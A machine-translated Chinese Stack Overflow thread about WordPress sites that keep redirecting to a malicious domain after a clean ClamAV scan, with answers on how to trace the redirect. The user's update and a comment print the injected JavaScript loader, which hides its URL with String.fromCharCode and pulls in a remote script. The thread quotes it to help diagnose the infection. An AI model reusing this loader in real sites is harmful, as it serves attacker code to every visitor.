WordPress恶意软件 - 重定向到(fast.destinyfernandi.com) - 即使在扫描和清理之后[关闭]

Posted

技术标签:

【中文标题】WordPress恶意软件 - 重定向到(fast.destinyfernandi.com) - 即使在扫描和清理之后[关闭]【英文标题】:WordPress Malware - Redirect to (fast.destinyfernandi.com) - even after scan and clean [closed] 【发布时间】:2020-06-09 01:58:42 【问题描述】:

我正在经历更糟糕的噩梦。我有一个 CentOS 服务器,它托管了 10 个 WordPress 网站。

我的客户注意到他们的网站正在打开,并且在加载后被重定向到 (fast.destinyfernandi.com)

我使用 ClamAV 检测恶意软件并手动清理它们,但没有成功。

以下是其中一个网站的 Clamscan 命令结果示例:

----------- SCAN SUMMARY -----------
Known viruses: 6938202
Engine version: 0.101.5
Scanned directories: 2300
Scanned files: 91116
Infected files: 0
Data scanned: 4588.75 MB
Data read: 24121.63 MB (ratio 0.19:1)
Time: 1705.569 sec (28 m 25 s)

但该网站仍在重定向到该恶意软件网站。

有人遇到过这样的问题吗?

请帮忙。

===================================已解决:=========== ===================

代码被注入到所有js文件中

var hglgfdrr4634hezfdg = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,116,111,109,46,118,101,114,121,98,101,97,116,105,102,117,108,97,110,116,111,110,121,46,99,111,109,47,97,46,106,115); s.src=pl;
if (document.currentScript) 
document.currentScript.parentNode.insertBefore(s, document.currentScript);
 else 
d.getElementsByTagName('head')[0].appendChild(s);

【问题讨论】:

熬夜找到恶意代码:var hglgfdrr4634hezfdg = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true; var pl = String.fromCharCode(104,116,116,112,115,58,47,47,116,111,109,46,118,101,114,121,98,101,97,116,105,102,117,108,97,110,116,111,110,121,46,99,111,109,47,97,46,106,115); s.src=pl; if (document.currentScript) document.currentScript.parentNode.insertBefore(s, document.currentScript); else d.getElementsByTagName('head')[0].appendChild(s); 你找到永久修复了吗,我们也面临同样的恶意软件,但经过一周清理后它再次攻击,没有解决方案有效。 【参考方案1】:

有几种方法可以将您的网络资源重定向到命运费尔南迪。

    可以修补数据库并且您自己的合法代码可以 重定向 一些在 php 或 JS 或 html 模板中注入的代码 通过 window.location 或 meta 或响应标头重定向。

首先发现你被重定向到的地址,无论是命运费尔南迪还是其他一些 URL。 我的意思是你可能会被重定向到一些“不可见”的 URL1 和服务于 URL1 的服务器会将浏览器进一步重定向到命运费尔南迪。

一旦您发现重定向中的第一跳 (URL) 是什么,您就可以在源代码和数据库转储中搜索错误的 URL。

您的代码中也有可能会混淆第一跳 URL(很可能是命运费尔南迪),但希望不是这样。

您还可以添加在重定向时触发的断点,这可以帮助您识别混淆的 JS 代码:

window.addEventListener("beforeunload", function()  debugger; , false)

【讨论】:

感谢您提供的断点代码 :) @RamiAlnairab 你找到永久修复了吗,我们也面临同样的恶意软件,但清理一周后它再次攻击,没有解决方案有效 同样的事情发生在我们身上。我们正在更新操作系统、WordPress,删除恶意软件代码手册。您也可以尝试安装 WP 防火墙。它可以帮助向您展示攻击,但不会捕获脚本。我会用最新的攻击来更新这个姿势。

以上是关于WordPress恶意软件 - 重定向到(fast.destinyfernandi.com) - 即使在扫描和清理之后[关闭]的主要内容,如果未能解决你的问题,请参考以下文章

犯罪分子劫持路由器 DNS 设置将用户重定向至安卓恶意软件

网站因重定向而被报告为恶意网站

带有正则表达式通配符的 WordPress PHP 重定向

WordPress 博客感染了 HTML Refresh 元标记

让 wordpress 重定向到不同的地方,或者根本不重定向

阻止 WordPress 从 301 重定向 /index.php 到 /